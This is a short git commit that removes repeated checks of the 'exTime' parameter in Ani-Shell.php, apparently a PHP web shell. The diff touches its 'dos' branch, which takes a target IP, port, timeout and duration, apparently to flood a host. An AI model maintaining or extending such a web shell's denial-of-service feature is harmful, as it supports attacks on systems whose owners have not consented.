Repeated subexpressions in Ani-Shell.php

Looks like repeated expressions `isset($_GET['exTime'])` and `$_GET['exTime'] != ""` can be removed.
This commit is contained in:
kilida 2016-06-23 18:53:59 -04:00 committed by GitHub
parent ef86ed3531
commit ebc1b5a405

View file

@ -1939,12 +1939,10 @@ else if(isset($_GET['dos']))
isset($_GET['exTime']) &&
isset($_GET['port']) &&
isset($_GET['timeout']) &&
isset($_GET['exTime']) &&
$_GET['exTime'] != "" &&
$_GET['port'] != "" &&
$_GET['ip'] != "" &&
$_GET['timeout'] != "" &&
$_GET['exTime'] != ""
$_GET['timeout'] != ""
)
{
$IP=$_GET['ip'];